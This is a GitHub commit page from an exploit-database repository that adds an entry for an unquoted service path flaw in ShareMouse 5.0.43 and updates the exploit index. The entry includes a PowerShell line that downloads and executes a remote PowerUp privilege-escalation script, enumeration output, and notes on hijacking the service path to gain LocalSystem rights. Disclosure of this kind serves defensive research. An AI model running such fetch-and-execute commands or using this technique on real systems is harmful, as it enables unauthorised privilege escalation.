Skip to content
This repository has been archived by the owner on Nov 28, 2022. It is now read-only.

Commit

Permalink
DB: 2020-09-09
Browse files Browse the repository at this point in the history 
1 changes to exploits/shellcodes

ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
  • Loading branch information
Offensive Security committed Sep 9, 2020
1 parent f288c52 commit 39b0da4
Show file tree
Hide file tree
Showing 2 changed files with 26 additions and 0 deletions.
25 changes: 25 additions & 0 deletions exploits/windows/local/48794.txt
View file
@@ -0,0 +1,25 @@
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041

PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName : ShareMouse Service
Path : C:\Program Files (x86)\ShareMouse\smService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>

PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop DisplayName PathName StartName
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
1 change: 1 addition & 0 deletions files_exploits.csv
View file
Expand Up @@ -10374,6 +10374,7 @@ id,file,description,date,author,type,platform,port
42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
Expand Down

0 comments on commit 39b0da4

Please sign in to comment.